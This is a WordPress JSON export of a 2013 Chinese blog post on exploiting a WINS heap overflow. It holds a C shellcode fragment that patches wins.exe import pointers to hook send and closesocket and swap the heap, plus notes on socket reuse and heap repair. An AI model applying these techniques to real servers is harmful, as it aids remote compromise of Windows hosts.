{"id":858,"date":"2013-06-13T21:49:03","date_gmt":"2013-06-13T13:49:03","guid":{"rendered":"http:\/\/notes.zerobox.org\/?p=858"},"modified":"2013-06-13T21:49:03","modified_gmt":"2013-06-13T13:49:03","slug":"wins%e5%a0%86%e6%ba%a2%e5%87%ba%e6%bc%8f%e6%b4%9e%e7%9a%84%e5%88%a9%e7%94%a8%e6%8a%80%e5%b7%a7","status":"publish","type":"post","link":"http:\/\/zerobox.org\/notes\/858.html","title":{"rendered":"wins\u5806\u6ea2\u51fa\u6f0f\u6d1e\u7684\u5229\u7528\u6280\u5de7"},"content":{"rendered":"

newheap=HeapCreateadd(HEAP_GENERATE_EXCEPTIONS,0x10000,0);
\ni=*(int\u00a0*)(0x7ffdf008);\u00a0\/\/\u00a0wins.exe\u00a0address;<\/p>\n

j=0;
\nfor(k=0;k<0x30000;k+=4)
\n{
\nif(*(int\u00a0*)(i+k)==sendadd)
\n{<\/p>\n

VirtualProtectadd((i+k)&0xfffff000,0x1000,0x04,&l);<\/p>\n

*(int\u00a0*)(i+k)=newcalladd;
\nVirtualProtectadd((i+k)&0xfffff000,0x3000,l,&l);<\/p>\n

j^=0x1;
\n\/\/\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0break;
\n}
\nif(*(int\u00a0*)(i+k)==closesocketadd)
\n{
\nVirtualProtectadd((i+k)&0xfffff000,0x1000,0x04,&l);
\n*(int\u00a0*)(i+k)=newcalladd+5;
\nVirtualProtectadd((i+k)&0xfffff000,0x3000,l,&l);
\nj^=0x2;
\n\/\/\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0break;
\n}<\/p>\n

if(*(int\u00a0*)(i+k)==((int\u00a0)ptr&0xffff0000))
\n{
\nVirtualProtectadd((i+k)&0xfffff000,0x1000,0x04,&l);
\n*(int\u00a0*)(i+k)=newheap;
\nVirtualProtectadd((i+k)&0xfffff000,0x3000,l,&l);
\nj^=0x4;
\n\/\/\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0break;
\n}
\nif(j==7)\u00a0break;
\n}<\/p>\n

<\/p>\n

1\u3001\u5982\u4f55\u590d\u7528socket\u3002<\/p>\n

\u56e0\u4e3aserver\u6709\u7ebf\u7a0b\u4e0d\u505c\u7684\u63a5\u6536\u6570\u636e\uff0csocket\u5c31\u662f\u627e\u5230\uff0cshellcode\u4e5f\u4f1a\u548cserver\u4e89\u5f3a\u63a5\u6536\u6570\u636e\u3002<\/p>\n

shellcode\u00a0hook\u00a0closesocket\uff0cexp\u53d1\u9001\u9519\u8bef\u6570\u636e\uff0cserver\u5173\u95edsocket,shellcode\u62e6\u622a\u540e\u5f97\u5230socket\uff0cserver\u4e5f\u4e0d\u518d\u4e89\u62a2\u6570\u636e\u3002<\/p>\n

2\u3001\u5806\u4fee\u590d<\/p>\n

\u91cd\u65b0\u7533\u8bf7\u4e00\u4e2a\u5806\u66ff\u6362\u9ed8\u8ba4\u5806\u3002<\/p>\n

<\/p>\n

\u6765\u6e90:http:\/\/hi.baidu.com\/yuange1975\/item\/5addd6d07cfde41ad78ed0f2<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"

newheap=HeapCreateadd(HEAP_GENERATE_EXCE …<\/p>\n

\u7ee7\u7eed\u9605\u8bfb »<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-858","post","type-post","status-publish","format-standard","hentry"],"views":1014,"_links":{"self":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts\/858","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/comments?post=858"}],"version-history":[{"count":0,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts\/858\/revisions"}],"wp:attachment":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/media?parent=858"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/categories?post=858"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/tags?post=858"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}